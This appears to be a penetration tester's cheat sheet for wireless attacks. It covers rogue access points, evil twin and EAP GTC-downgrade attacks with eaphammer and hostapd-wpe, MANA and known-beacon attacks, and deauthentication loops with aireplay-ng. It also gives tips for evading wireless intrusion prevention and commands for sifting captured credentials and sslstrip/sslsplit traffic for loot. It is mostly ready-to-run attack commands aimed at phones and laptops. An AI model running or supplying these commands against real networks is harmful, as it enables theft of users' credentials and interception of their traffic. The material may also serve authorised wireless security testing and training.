Rogue AP and MANA

Opsec Considerations:
- Enable 802.11w to prevent deauthentication frames from WIPS.
- Spoof BSSID of an AP that is not in the wireless range to avoid BSS confilcts.
- You cannot target specific devices using MAC-based Management Frame ACL for beacon frames related attacks.

For EAPHammer hardware modes use flag --hw-mode (default is 802.11a or 802.11b depending on specified channel):
- 802.11b Older specification, 2.4GHz only
- 802.11a Used for creating 5GHz access points
- 802.11g Used for creating 2.4GHz access points
- 802.11n Can be used on both the 2.4GHz and 5GHz spectrums (default uses 20MHz channel else use --channel-width 40)

Rogue AP and Evil Twin attack

Rogue AP - EAP
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
GTC downgrade

Opsec Considerations:

During the negotiation there are two indicators on the wireless endpoint : EAP method not supported by legitimate AP and EAP methods are suggested in a different order.

Efficient against Android phones.

Efficient against iOS but it prompt for certificate.

Only a challenge-response against Windows can be captured.

Does not work if:
- the supplicant uses a certificate based authentication since there is no inner authentication
- the supplicant validates the server certificate

Balanced Approach (default)

Phase 1 (outer authentication):


Phase 2 (inner authentication):


./eaphammer -i <wlan0> --auth wpa-eap -e <SSID> --creds -c <same_channel> -b <similar_BSSID>

Explicite GTC downgrade

./eaphammer -i <wlan0> --negotiate gtc-downgrade --auth wpa-eap -e <ESSID> --creds [--hw-mode <g/a>] [-c <channel>] [-b <BSSID>]
Open and PSK
./eaphammer -i <wlan0> --bssid <BSSID> -e <ESSID> -c <channel> --auth open [--captive-portal | --hostile-portal]
./eaphammer -i <wlan0> -e <ESSID> -c <channel> --auth wpa-psk --wpa-passphrase <psk>

aireplay-ng -0 0 -a <ap_mac>

MANA and known beacon attacks

WIPS is present

Create white list

echo <BSSID> > bssid_targets.txt

Create rogue AP

./eaphammer -i <wlan0> --e <ESSID> --pmf enable --cloaking full --mana --auth <wpa-eap | wpa-psk> --creds --mac-whitelist bssid_targets.txt

As the rogue AP is waiting for probe requests, deauthenticate supplicants

for i in `cat bssid_targets.txt`; do aireplay-ng -0 5 -a <ap_mac> -c $i; done 
MANA loud mode
./eaphammer -i <wlan0> -e <ESSID> --cloaking full --mana --loud
Known beacon
./eaphammer -i <wlan0> --mana -e <known_ESSID> --known-beacons --captive-portal --known-ssids-file <list_of_known_ESSID.txt> [--loud]
Old technique

Start Mana - Custom script



cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keywork>
cp -r /var/lib/mana-toolkit/sslsplit/ /tmp
bulk_extractor -R /tmp/sslsplit/ -o /tmp/loot
binwalk /tmp/sslsplit/* -e